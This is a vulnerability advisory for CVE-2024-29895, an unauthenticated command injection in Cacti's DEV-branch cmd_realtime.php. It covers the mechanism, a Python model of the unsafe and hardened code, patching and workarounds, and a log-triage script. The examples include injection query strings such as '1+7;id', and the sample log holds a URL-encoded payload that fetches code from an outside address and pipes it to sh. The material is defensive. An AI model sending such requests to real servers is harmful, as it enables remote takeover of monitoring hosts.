CVE-2024-29895

10.0 CRITICAL

📋 TL;DR

CVE-2024-29895 is a critical command injection vulnerability in Cacti's 1.3.x DEV branch that lets an unauthenticated attacker execute arbitrary commands on the server as the web server user. cmd_realtime.php is a poller helper written to be run from the command line, but it lives in the web root and reads its arguments from $_SERVER['argv']. When PHP's register_argc_argv option is On, PHP also populates $_SERVER['argv'] for web requests, from the raw query string split on '+', so a single HTTP GET to cmd_realtime.php with a crafted query string lands attacker-controlled text in the $poller_id value (line 119 of the vulnerable revision) that the script builds into the command it executes. Every install on a vulnerable revision is exposed wherever that option is On, which is PHP's compiled-in default.

💻 Affected Systems

Products:
  • Cacti
Versions: 1.3.x DEV branch, revisions before commit 53e8014d1f082034e0646edc6286cde3800c683d, plus any later revision that carries the revert 99633903cad0de5ace636249de16f77e57a3c8fc without a subsequent re-fix
Operating Systems: All operating systems running PHP with Cacti
Default Config Vulnerable: ⚠️ Yes
Notes: Exploitable only when PHP's register_argc_argv is On for the SAPI that serves Cacti. On is PHP's compiled-in default, so it applies wherever no php.ini overrides it, including the official PHP Docker images, which ship without an active php.ini; the php.ini-production and php.ini-development templates set it Off. The CLI SAPI hardcodes the option On regardless of php.ini. That creates no exposure by itself (the attack needs a web SAPI), but it does mean a shell-based check of the setting always reports On (see How to Verify).
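To make the mechanism concrete, here is an added model in Python (not Cacti's code, and not the PHP from the repository): it reproduces how PHP derives $_SERVER['argv'] from a request's query string when register_argc_argv is On, the vulnerable shape of concatenating one of those elements into a command, and a hardened replacement that allow-lists the value and keeps the shell out entirely. The command layout, the argv index and the function names are assumptions for illustration; nothing is executed.

```python
"""Model of the cmd_realtime.php injection path and of a hardened replacement.

Added illustration, not Cacti's code: the real script, the argv index it reads
and the command it launches differ.  The command layout, ARGV_INDEX and the
function names below are assumptions.  Nothing is executed; the functions only
build the command so the effect of attacker input can be inspected.
"""
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Hypothetical command the script would launch (assumed, not Cacti's real one).
PHP_BINARY = "/usr/bin/php"
POLLER_SCRIPT = "/var/www/html/cacti/poller.php"
ARGV_INDEX = 1  # assumed position of the poller id within $_SERVER['argv']


def php_argv_from_request(request_uri: str) -> List[str]:
    """What PHP stores in $_SERVER['argv'] for a web request when
    register_argc_argv is On: the raw QUERY_STRING split on '+'.  Unlike the
    CLI there is no script name in front and the pieces are not URL-decoded.
    A request without a query string yields an empty array."""
    query = urlsplit(request_uri).query
    return query.split("+") if query else []


def build_realtime_command_unsafe(argv: List[str]) -> str:
    """The vulnerable shape: an argv element interpolated into a shell string.
    Handing the result to a shell (exec(), shell_exec(), `sh -c`) runs whatever
    metacharacters the attacker placed in the query string."""
    poller_id = argv[ARGV_INDEX] if len(argv) > ARGV_INDEX else ""
    return f"{PHP_BINARY} {POLLER_SCRIPT} --poller={poller_id}"


def build_realtime_command_safe(argv: List[str]) -> List[str]:
    """Hardened shape: allow-list the value as a positive integer and return an
    argument vector so it reaches the poller without a shell ever parsing it.
    The allow list stops the injection; the argv form also removes the shell
    from the picture, so an encoded or overlooked metacharacter cannot matter."""
    if len(argv) <= ARGV_INDEX:
        raise ValueError("poller id argument missing")
    poller_id = argv[ARGV_INDEX]
    if not re.fullmatch(r"[1-9][0-9]*", poller_id):
        raise ValueError(f"invalid poller id {poller_id!r}")
    return [PHP_BINARY, POLLER_SCRIPT, f"--poller={poller_id}"]


def shell_would_run_extra_command(command: str) -> bool:
    """Demo-only check: would `sh -c command` run more than one command?  This
    looks for the operators an injection relies on; it is not a shell parser."""
    return any(op in command for op in (";", "|", "&&", "`", "$(", "\n"))


def demo(request_uri: str) -> dict:
    """Feed one request through both builders and report what each does."""
    argv = php_argv_from_request(request_uri)
    unsafe = build_realtime_command_unsafe(argv)
    safe: Optional[List[str]]
    try:
        safe = build_realtime_command_safe(argv)
        rejected = False
    except ValueError:
        safe, rejected = None, True
    return {
        "argv": argv,
        "unsafe_command": unsafe,
        "unsafe_injects": shell_would_run_extra_command(unsafe),
        "safe_argv": safe,
        "safe_rejected": rejected,
    }


if __name__ == "__main__":
    # Constructed requests: a benign poller id, then one with a shell
    # metacharacter in the second '+'-separated token.
    for uri in ("/cacti/cmd_realtime.php?1+7", "/cacti/cmd_realtime.php?1+7;id"):
        print(uri, demo(uri))
```

The second constructed request shows why the fix has to be an allow list rather than escaping: "7;id" reaches the unsafe builder untouched and would run `id` under `sh -c`, while the safe builder rejects it before any command exists. Turning register_argc_argv Off makes php_argv_from_request irrelevant, because PHP then never populates $_SERVER['argv'] for a web request at all.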

⚠️ Manual Verification Required

This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine whether your system is affected.

Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).

Recommended Actions:
  1. Review the CVE details at NVD
  2. Check vendor security advisories for your specific version
  3. Test if the vulnerability is exploitable in your environment
  4. Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise leading to data theft, ransomware deployment, lateral movement across the network, and persistent backdoor installation.

🟠

Likely Case

Remote code execution as the web server user, leading to web shell installation, harvesting of the SNMP community strings and device credentials that Cacti stores for the devices it monitors, and an initial foothold for further attacks.

🟢

If Mitigated

Reduced blast radius if Cacti runs as an unprivileged user, is segmented from the rest of the network and has no outbound internet access; the attacker still gets code execution on the monitoring host and reach to whatever that host polls over SNMP.

🌐 Internet-Facing: HIGH - Unauthenticated remote exploitation with maximum CVSS score of 10.0 makes internet-facing systems extremely vulnerable.
🏢 Internal Only: HIGH - Even internal systems are vulnerable to any network-accessible attacker, including compromised internal hosts.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

A single HTTP GET is enough: with register_argc_argv On, PHP turns the query string into $_SERVER['argv'], and cmd_realtime.php passes one of those elements into the command it executes without validating it. The public advisory names the file and line, and both the fixing and the reverting commit are in the public repository.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Commit 53e8014d1f082034e0646edc6286cde3800c683d (note: this commit was reverted in 99633903cad0de5ace636249de16f77e57a3c8fc, so a checkout that contains the fix commit may still be vulnerable; confirm what the current cmd_realtime.php does rather than trusting the presence of the hash)

Vendor Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m

Restart Required: No for the code fix itself; PHP picks up a changed source file on the next request, or within opcache.revalidate_freq seconds (2 by default) when opcache is on. The exception is opcache.validate_timestamps=0, which keeps serving the cached file until PHP-FPM or Apache is restarted. The register_argc_argv workaround below does require a PHP reload or restart.

Instructions:

1. Update to the latest Cacti release that includes the fix.
2. If you run the DEV branch, move to a revision in which commit 53e8014d1f082034e0646edc6286cde3800c683d is applied and not undone by 99633903cad0de5ace636249de16f77e57a3c8fc.
3. Verify on the running tree that cmd_realtime.php no longer passes an unvalidated $_SERVER['argv'] value into the command it executes.

🔧 Temporary Workarounds

Disable register_argc_argv (platform: all)

Set PHP's register_argc_argv to Off for the web SAPI so a query string is no longer turned into $_SERVER['argv']. This is safe for Cacti: its pollers run under the CLI SAPI, which forces the option On regardless of php.ini, so the poller and cmd_* scripts still receive their real command-line arguments. Reload PHP-FPM or restart Apache afterwards and confirm the change through the web SAPI, not from a shell.

php.ini: register_argc_argv = Off
Docker: Add '-d register_argc_argv=0' to PHP command (this only takes effect when the container's command is php-fpm or php -S; for the Apache variants of the official image, put a file containing the php.ini line above into /usr/local/etc/php/conf.d/, which the image scans on startup)

Network Access Control (platform: linux)

Restrict access to the Cacti web interface to trusted networks only. The two ACCEPT rules below only help if the INPUT chain's default policy is DROP, or if a DROP rule for the same ports follows them; on their own they admit trusted sources and change nothing for anyone else. If Cacti sits behind a reverse proxy, an allow list there, or a deny rule for cmd_realtime.php specifically, is the simpler control.

iptables -A INPUT -p tcp --dport 80 -s TRUSTED_NETWORK -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_NETWORK -j ACCEPT

🧯 If You Can't Patch

  • Immediately disable or block access to the Cacti web interface
  • At minimum, deny HTTP access to cmd_realtime.php at the web server or reverse proxy: it is a command-line poller helper that serves no page, so nothing legitimate breaks
  • Implement strict network segmentation and firewall rules to isolate Cacti servers

🔍 How to Verify

Check if Vulnerable:

You are exposed if both hold: (a) you run a 1.3.x DEV checkout whose cmd_realtime.php still takes $poller_id from $_SERVER['argv'] and passes it into the executed command without validation (line 119 in the revision the advisory cites; line numbers drift on a DEV branch, so read the code rather than counting lines), and (b) register_argc_argv is On for the SAPI that serves Cacti. Do not check (b) with php -i or php -r from a shell: the CLI SAPI hardcodes register_argc_argv=1 and always reports On. Read it through the web SAPI instead, for example from a temporary phpinfo() page served by the same PHP-FPM pool or Apache instance, and delete that page afterwards.

Check Version:

Run php -r "include 'include/global.php'; echo CACTI_VERSION;" from the Cacti install directory, or open the About page in the Cacti web interface. For a DEV checkout the version string is not enough: use git log to check whether 53e8014d1f082034e0646edc6286cde3800c683d is an ancestor of your HEAD, and whether 99633903cad0de5ace636249de16f77e57a3c8fc is too.

Verify Fix Applied:

Verify that commit 53e8014d1f082034e0646edc6286cde3800c683d is present and has not been reverted, then confirm the behaviour rather than the hash: on a test instance, a GET to cmd_realtime.php whose query string carries a non-numeric token must be rejected before any command is built. With register_argc_argv already Off in the web SAPI, PHP does not populate $_SERVER['argv'] for web requests at all, and that path is closed regardless of the code.

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution in system logs (auditd execve events, process accounting) attributed to the web server user
  • Web server access log entries for cmd_realtime.php at all: it is a command-line poller helper that no browser or Cacti page ever fetches, so any HTTP request for it is a probe; shell metacharacters in its query string, literal or URL-encoded, indicate an exploitation attempt
  • Child processes of the PHP workers other than the expected Cacti pollers (shells, curl, wget, perl or python spawned by www-data or apache)

Network Indicators:

  • Unusual outbound connections from Cacti server
  • Traffic to known malicious IPs or domains

SIEM Query:

source="web_server_logs" AND uri="*cmd_realtime.php*" AND (param="*;*" OR param="*|*" OR param="*`*" OR param="*$(*")

The metacharacter clause misses URL-encoded payloads (%3B, %7C, %60, %24%28); match against the decoded query string, or alert on uri="*cmd_realtime.php*" alone, since no legitimate client requests that path.
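As an added example (not part of this page's tooling or of Cacti), the following Python script applies that logic to constructed access-log lines: it flags every request for cmd_realtime.php and escalates to "injection" when the query string contains shell metacharacters after URL-decoding, so encoded payloads are caught too. The log lines and addresses are constructed for the demo; the format is the Apache/nginx "combined" log.

```python
"""Access-log triage for CVE-2024-29895 probes and exploitation attempts.

Added example, not part of the page's or Cacti's tooling.  Two signals: any
HTTP request for cmd_realtime.php (a command-line poller helper that no
browser or Cacti page fetches) is at least a probe, and shell metacharacters in
its query string, checked after URL-decoding, mark an injection attempt.
"""
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import unquote, urlsplit

TARGET = "cmd_realtime.php"

# Apache/nginx "combined" format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that end or chain a shell word; a valid poller id has none of them.
SHELL_META = re.compile(r"[;|&`$<>\r\n]")

# Constructed sample log (addresses from the documentation ranges): a benign
# page view, a probe, a literal injection, a URL-encoded injection, another
# benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [14/May/2024:10:01:02 +0000] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [14/May/2024:10:01:05 +0000] "GET /cacti/cmd_realtime.php?1+1 HTTP/1.1" 200 17 "-" "curl/8.5.0"
203.0.113.5 - - [14/May/2024:10:01:09 +0000] "GET /cacti/cmd_realtime.php?1+1;id HTTP/1.1" 200 412 "-" "curl/8.5.0"
198.51.100.7 - - [14/May/2024:10:02:41 +0000] "GET /cacti/cmd_realtime.php?1+1%3Bcurl%20http://198.51.100.9/x%7Csh HTTP/1.1" 200 0 "-" "python-requests/2.31"
192.0.2.10 - - [14/May/2024:10:03:00 +0000] "GET /cacti/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def classify(uri: str) -> Optional[str]:
    """'injection', 'probe' or None for one request URI."""
    parts = urlsplit(uri)
    if parts.path.rsplit("/", 1)[-1] != TARGET:
        return None
    # PHP splits the raw query on '+'; decode first so %3B, %7C, %60 and
    # %24%28 are caught as well as the literal characters.
    decoded = unquote(parts.query)
    return "injection" if SHELL_META.search(decoded) else "probe"


def scan(lines: Iterable[str]) -> List[dict]:
    """Return one finding per matching request, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        verdict = classify(m["uri"])
        if verdict:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                "uri": m["uri"], "verdict": verdict,
            })
    return findings


def by_source(findings: List[dict]) -> Dict[str, int]:
    """Count findings per client address to prioritise response."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for f in found:
        print(f["verdict"].upper(), f["ip"], f["ts"], f["uri"])
    print("per source:", by_source(found))
```

A 200 on an injection line says only that the script ran, not that the injected command succeeded; confirm that from the process and network evidence listed above. The probe line deserves the same triage, since the script runs happily with a benign argument and the same client sent the injection four seconds later.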
